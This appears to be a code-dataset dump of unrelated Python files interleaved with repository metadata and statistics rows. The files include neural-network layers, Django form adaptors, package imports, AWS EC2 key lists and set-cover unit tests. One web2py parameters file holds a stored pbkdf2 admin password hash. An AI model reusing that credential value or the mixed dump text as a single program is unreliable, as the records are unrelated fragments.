bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
# top_multitask_layer has shape [None, layer_sizes[-1]]
top_multitask_layer = prev_layer
for task in range(self.n_tasks):
# TODO(rbharath): Might want to make it feasible to have multiple
# bypass layers.
# Construct task bypass layer
prev_bypass_layer = top_layer
prev_bypass_layer_size = num_features
for i in range(num_bypass_layers):
# bypass_layer has shape [None, bypass_layer_sizes[i]]
print("Adding bypass weights of shape %s" % str(
[prev_bypass_layer_size, bypass_layer_sizes[i]]))
bypass_layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_bypass_layer,
size=bypass_layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_bypass_layer_size, bypass_layer_sizes[i]],
stddev=bypass_weight_init_stddevs[i]),
bias_init=tf.constant(
value=bypass_bias_init_consts[i],
shape=[bypass_layer_sizes[i]])))
bypass_layer = model_ops.dropout(bypass_layer, bypass_dropouts[i],
training)
prev_bypass_layer = bypass_layer
prev_bypass_layer_size = bypass_layer_sizes[i]
top_bypass_layer = prev_bypass_layer
if num_bypass_layers > 0:
# task_layer has shape [None, layer_sizes[-1] + bypass_layer_sizes[-1]]
task_layer = tf.concat(
axis=1, values=[top_multitask_layer, top_bypass_layer])
task_layer_size = layer_sizes[-1] + bypass_layer_sizes[-1]
else:
task_layer = top_multitask_layer
task_layer_size = layer_sizes[-1]
print("Adding output weights of shape %s" % str([task_layer_size, 1]))
output.append(
tf.squeeze(
model_ops.fully_connected_layer(
tensor=task_layer,
size=1,
weight_init=tf.truncated_normal(
shape=[task_layer_size, 1],
stddev=weight_init_stddevs[-1]),
bias_init=tf.constant(
value=bias_init_consts[-1], shape=[1])),
axis=1))
return (output, labels, weights)
| 41.377644
| 81
| 0.634711
| 1,601
| 13,696
| 5.085572
| 0.110556
| 0.083763
| 0.055023
| 0.039548
| 0.930115
| 0.92594
| 0.921887
| 0.910833
| 0.910833
| 0.899779
| 0
| 0.007473
| 0.286799
| 13,696
| 330
| 82
| 41.50303
| 0.826065
| 0.107477
| 0
| 0.879699
| 0
| 0
| 0.048031
| 0.004037
| 0
| 0
| 0
| 0.006061
| 0.022556
| 1
| 0.015038
| false
| 0.293233
| 0.037594
| 0
| 0.067669
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ad66c38061361102278e016fe22912adfe039512
| 3,160
|
py
|
Python
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 13
|
2018-02-10T14:52:05.000Z
|
2021-08-31T21:21:58.000Z
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 1
|
2019-06-13T15:55:08.000Z
|
2020-07-16T17:35:09.000Z
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 2
|
2018-05-15T14:54:28.000Z
|
2019-05-19T14:59:18.000Z
|
import sys
from django.forms.models import modelform_factory
from inplaceeditform.fields import BaseAdaptorField
from cropwatch.apps.metrics.forms import HabitatManageForm
if sys.version_info[0] == 2:
string = basestring
else:
string = str
unicode = str
class MyAdaptor(BaseAdaptorField):
MULTIPLIER_HEIGHT = 1.75
INCREASE_WIDTH = 40
@property
def name(self):
return 'myadaptor'
def treatment_height(self, height, font_size, width=None):
if 'height' in self.config:
effective_height = height
else:
effective_height = font_size
return "%spx" % (effective_height * self.MULTIPLIER_HEIGHT)
def treatment_width(self, width, font_size, height=None):
return "%spx" % (width + self.INCREASE_WIDTH)
def render_value(self, field_name=None):
value = super(MyAdaptor, self).render_value(field_name)
if not isinstance(value, string):
value = unicode(value)
return value
def get_form_class(self):
# The form has to be here,
return modelform_factory(self.model, form=HabitatManageForm, fields='__all__')
# and request.user has to be injected here,
def get_form(self):
form_class = self.get_form_class()
return form_class(instance=self.obj, initial=self.initial, prefix=id(form_class), user=self.request.user, )
def get_value_editor(self, value):
value = super(MyAdaptor, self).get_value_editor(value)
return value and value.pk
def save(self, value):
setattr(self.obj, "%s_id" % self.field_name, value)
self.obj.save()
if sys.version_info[0] == 2:
string = basestring
else:
string = str
unicode = str
class ScheduleChange(BaseAdaptorField):
MULTIPLIER_HEIGHT = 1.75
INCREASE_WIDTH = 40
@property
def name(self):
return 'schedule_change'
def treatment_height(self, height, font_size, width=None):
if 'height' in self.config:
effective_height = height
else:
effective_height = font_size
return "%spx" % (effective_height * self.MULTIPLIER_HEIGHT)
def treatment_width(self, width, font_size, height=None):
return "%spx" % (width + self.INCREASE_WIDTH)
def render_value(self, field_name=None):
value = super(ScheduleChange, self).render_value(field_name)
if not isinstance(value, string):
value = unicode(value)
return value
# def get_form_class(self):
# The form has to be here,
# return modelform_factory(self.model, form=HabitatManageForm, fields='__all__')
# and request.user has to be injected here,
# def get_form(self):
# form_class = self.get_form_class()
# return form_class(instance=self.obj, initial=self.initial, prefix=id(form_class), user=self.request.user, )
# def get_value_editor(self, value):
# value = super(ScheduleChange, self).get_value_editor(value)
# return value and value.pk
def save(self, value):
self.obj.end = self.obj.start
setattr(self.obj, "%s_id" % self.field_name, value)
self.obj.save()
| 29.811321
| 115
| 0.666772
| 404
| 3,160
| 5.032178
| 0.200495
| 0.04427
| 0.027546
| 0.01574
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0
| 0.00578
| 0.233544
| 3,160
| 105
| 116
| 30.095238
| 0.833609
| 0.167405
| 0
| 0.716418
| 0
| 0
| 0.026356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.19403
| false
| 0
| 0.059701
| 0.074627
| 0.507463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d10f1e89d18c59178e7ed8cd796a746292704f3d
| 423
|
py
|
Python
|
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
import torch
import math
train_x = torch.linspace(0, 1, 100)
train_y = torch.stack([
torch.sin(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2,
torch.cos(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2,
], -1)
train_z = torch.stack([
torch.sin(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2,
torch.cos(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2,
])
| 35.25
| 75
| 0.617021
| 76
| 423
| 3.289474
| 0.236842
| 0.216
| 0.112
| 0.176
| 0.768
| 0.768
| 0.768
| 0.768
| 0.768
| 0.768
| 0
| 0.050992
| 0.165485
| 423
| 12
| 76
| 35.25
| 0.657224
| 0
| 0
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d14126134f11a0144b5b3faf9ca9199d584fb2e9
| 92
|
py
|
Python
|
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | 2
|
2017-02-02T00:31:48.000Z
|
2017-08-08T22:36:25.000Z
|
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$bb0be0e1cc77c848$41955b75c2598e32eda3b9fd624e20c5dac4ceb6"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.450549
| 0.01087
| 92
| 1
| 92
| 92
| 0.450549
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0f35332ecad36b0d997e94c938259733018e6d5b
| 894
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.keras.applications.efficientnet namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from keras.applications.efficientnet import EfficientNetB0
from keras.applications.efficientnet import EfficientNetB1
from keras.applications.efficientnet import EfficientNetB2
from keras.applications.efficientnet import EfficientNetB3
from keras.applications.efficientnet import EfficientNetB4
from keras.applications.efficientnet import EfficientNetB5
from keras.applications.efficientnet import EfficientNetB6
from keras.applications.efficientnet import EfficientNetB7
from keras.applications.efficientnet import decode_predictions
from keras.applications.efficientnet import preprocess_input
del _print_function
| 40.636364
| 82
| 0.868009
| 105
| 894
| 7.257143
| 0.419048
| 0.245407
| 0.418635
| 0.433071
| 0.511811
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00978
| 0.085011
| 894
| 21
| 83
| 42.571429
| 0.92176
| 0.209172
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.923077
| 0
| 0.923077
| 0.153846
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f5a1fa6940f5cb51fa0c48520552b382e1b4168
| 175
|
py
|
Python
|
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
from elichika.parser import core
from elichika.parser import nodes
from elichika.parser import values
from elichika.parser import functions
from elichika.parser import utils
| 25
| 37
| 0.851429
| 25
| 175
| 5.96
| 0.36
| 0.402685
| 0.604027
| 0.805369
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 175
| 6
| 38
| 29.166667
| 0.967532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7e977a3942db35bd6425a1a916fca8d54c8baf90
| 179
|
py
|
Python
|
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
from crypto_engine.base_crypto_engine import CryptoEngine
from crypto_engine.fhe_crypto_engine import FHECryptoEngine
from crypto_engine.rsa_crypto_engine import RSACryptoEngine
| 35.8
| 59
| 0.910615
| 24
| 179
| 6.416667
| 0.416667
| 0.467532
| 0.311688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072626
| 179
| 4
| 60
| 44.75
| 0.927711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7eacd61cd1614663e2824856179f254a07d08384
| 77
|
py
|
Python
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 2
|
2018-06-17T18:56:54.000Z
|
2021-11-30T10:01:52.000Z
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 3
|
2016-12-12T15:41:43.000Z
|
2021-06-18T13:03:35.000Z
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 1
|
2021-11-30T10:01:56.000Z
|
2021-11-30T10:01:56.000Z
|
from .lawsuit_models import * # NOQA
from .decision_models import * # NOQA
| 25.666667
| 38
| 0.74026
| 10
| 77
| 5.5
| 0.6
| 0.436364
| 0.581818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 77
| 2
| 39
| 38.5
| 0.873016
| 0.116883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7ec88a5f4c349a26d19775518de765d6d377af5e
| 103
|
py
|
Python
|
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
class Jotaro:
def SayName(self):
print("Jotaro: ora ora ora ora ora ora ora ora ....!!!!")
| 25.75
| 65
| 0.582524
| 15
| 103
| 4
| 0.466667
| 0.7
| 0.9
| 1
| 0.4
| 0.4
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0.252427
| 103
| 3
| 66
| 34.333333
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0.466019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7d111ce509f434773f2b25bd894bdbf90f8d2970
| 74
|
py
|
Python
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 767
|
2019-03-28T00:22:53.000Z
|
2022-03-31T09:27:01.000Z
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 113
|
2019-03-30T20:44:58.000Z
|
2022-03-22T04:46:55.000Z
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 209
|
2019-03-28T16:06:04.000Z
|
2022-03-29T15:08:47.000Z
|
from baselines import *
from net10a import *
from net10a_twohead import *
| 18.5
| 28
| 0.797297
| 10
| 74
| 5.8
| 0.5
| 0.344828
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 0.162162
| 74
| 3
| 29
| 24.666667
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d192bc2cfedfe53591e43f262ecb5e94e45431b
| 1,437
|
py
|
Python
|
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
from typing import List
def keys_dict() -> dict:
# pylint: disable=all
return {'str': ['NetworkPerformance', 'InstanceType', 'EnaSupport', 'Hypervisor', 'EbsOptimizedSupport', 'EncryptionSupport'], 'bool': ['InstanceStorageSupported', 'CurrentGeneration', 'AutoRecoverySupported', 'Ipv6Supported', 'FreeTierEligible', 'HibernationSupported', 'BurstablePerformanceSupported', 'DedicatedHostsSupported', 'BareMetal'], 'list': ['SupportedStrategies', 'Accelerators', 'ValidCores', 'SupportedUsageClasses', 'Fpgas', 'Disks', 'Gpus', 'ValidThreadsPerCore', 'SupportedRootDeviceTypes', 'SupportedArchitectures'], 'dict': ['VCpuInfo', 'InferenceAcceleratorInfo', 'GpuInfo', 'EbsInfo', 'FpgaInfo', 'PlacementGroupInfo', 'ProcessorInfo', 'MemoryInfo', 'InstanceStorageInfo', 'NetworkInfo'], 'int': ['Ipv6AddressesPerInterface', 'DefaultThreadsPerCore', 'TotalGpuMemoryInMiB', 'MaximumNetworkInterfaces', 'HibernationSupported', 'TotalFpgaMemoryInMiB', 'TotalSizeInGB', 'DefaultVCpus', 'AutoRecoverySupported', 'DedicatedHostsSupported', 'CurrentGeneration', 'InstanceStorageSupported', 'Ipv6Supported', 'SizeInMiB', 'Ipv4AddressesPerInterface', 'DefaultCores', 'FreeTierEligible', 'BurstablePerformanceSupported', 'BareMetal'], 'float': ['SustainedClockSpeedInGhz'], 'other': []} # noqa: E501
def keys_structure(*arg, **kw) -> List:
return [elem for k, v in keys_dict().items()
if k in arg or not arg for elem in v]
| 110.538462
| 1,217
| 0.749478
| 102
| 1,437
| 10.529412
| 0.745098
| 0.013035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00536
| 0.091162
| 1,437
| 12
| 1,218
| 119.75
| 0.816998
| 0.020877
| 0
| 0
| 0
| 0
| 0.66144
| 0.287954
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0.333333
| 0.833333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7d27719ad0f0a76394a5cb96b2f82c5fae7b7e40
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name0_0_1_1_0_2_0 = None
name0_0_1_1_0_2_1 = None
name0_0_1_1_0_2_2 = None
name0_0_1_1_0_2_3 = None
name0_0_1_1_0_2_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.4
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bc01a622d1fc4ab0931b0e15fdd053a08364ab06
| 725
|
py
|
Python
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_innovationnorway_git.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:55 UTC)
def test_provider_import():
import terrascript.provider.innovationnorway.git
def test_datasource_import():
from terrascript.data.innovationnorway.git import git_repository
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.innovationnorway.git
#
# t = terrascript.provider.innovationnorway.git.git()
# s = str(t)
#
# assert 'https://github.com/innovationnorway/terraform-provider-git' in s
# assert '0.1.3' in s
| 29
| 80
| 0.754483
| 95
| 725
| 5.642105
| 0.610526
| 0.177239
| 0.201493
| 0.212687
| 0.164179
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024351
| 0.150345
| 725
| 24
| 81
| 30.208333
| 0.845779
| 0.704828
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
70e1591c104189efb210c26d2869c0fc90c0241d
| 2,821
|
py
|
Python
|
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
from source.set_cover import SetCover
from source.set_cover import Solution
import unittest
import numpy as np
class TestSetCover(unittest.TestCase):
def test_add_set(self):
instance = np.zeros((3, 4))
'''
test instance:
1 0 0 1
1 1 0 0
0 0 1 1
'''
instance[0][0] = 1
instance[0][3] = 1
instance[1][1] = 1
instance[1][0] = 1
instance[2][2] = 1
instance[2][3] = 1
set_cover = SetCover(instance)
sol = np.zeros(3)
sol[1] = 1
my_solution = Solution(set_cover, sol)
assert my_solution.is_feasible == False
my_solution.add_set(2)
assert my_solution.is_feasible == True
def test_is_feasible(self):
instance = np.zeros((3, 4))
'''
test instance:
1 0 0 1
1 1 0 0
0 0 1 1
'''
instance[0][0] = 1
instance[0][3] = 1
instance[1][1] = 1
instance[1][0] = 1
instance[2][2] = 1
instance[2][3] = 1
set_cover = SetCover(instance)
sol = np.zeros(3)
sol[1] = 1
sol[2] = 1
my_solution = Solution(set_cover, sol)
assert my_solution.is_feasible_solution() == True
def test_is_not_feasible(self):
instance = np.zeros((3, 4))
'''
test instance:
1 0 0 1
1 1 0 0
0 0 1 1
'''
instance[0][0] = 1
instance[0][3] = 1
instance[1][1] = 1
instance[1][0] = 1
instance[2][2] = 1
instance[2][3] = 1
set_cover = SetCover(instance)
sol = np.zeros(3)
sol[1] = 1
my_solution = Solution(set_cover, sol)
assert my_solution.is_feasible_solution() == False
def test_problem_is_solveable(self):
instance = np.zeros((3, 4))
'''
test instance:
1 0 0 1
1 1 0 0
0 0 1 1
'''
instance[0][0] = 1
instance[0][3] = 1
instance[1][1] = 1
instance[1][0] = 1
instance[2][2] = 1
instance[2][3] = 1
in_exception = False
try:
set_cover = SetCover(instance)
except Exception as _:
in_exception = True
assert in_exception == False
def test_problem_is_unsolveable(self):
instance = np.zeros((3, 4))
'''
test instance:
1 0 0 1
1 1 0 0
0 0 1 1
'''
instance[0][0] = 1
instance[0][3] = 1
instance[1][1] = 1
instance[1][0] = 1
in_exception = False
try:
set_cover = SetCover(instance)
except Exception as _:
in_exception = True
assert in_exception == True
if "__main__" == __name__:
unittest.main()
| 24.530435
| 58
| 0.495214
| 383
| 2,821
| 3.506527
| 0.112272
| 0.041698
| 0.033507
| 0.029784
| 0.857036
| 0.770663
| 0.770663
| 0.770663
| 0.770663
| 0.770663
| 0
| 0.096624
| 0.390996
| 2,821
| 114
| 59
| 24.745614
| 0.685099
| 0
